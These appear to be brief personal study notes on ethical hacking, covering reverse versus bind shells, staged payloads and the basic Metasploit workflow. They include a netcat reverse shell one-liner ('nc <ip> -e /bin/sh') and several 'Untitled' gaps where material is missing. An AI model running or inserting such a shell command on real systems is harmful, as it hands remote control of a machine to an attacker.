Five stages of ethical hacking

Reverse vs Bind Shell

Shell = Access to the machine shell

Reverse shell

most common

The victim connect to use, letting us access to it shell

nc <ip> -e /bin/sh

Untitled

Bind Shell

mostly on external assessment

listen to attackbox giving the access to the shell

Untitled

Staged vs non-staged payloads

payloads = what is run through the exploit

Untitled

difference → the / : multiple stages through the staged

try multiple playload, with different shell

Gaining Root with Metasploit

  1. msfconsole
  2. search <exploit>
  3. options
  4. set <options>
  5. run / exploit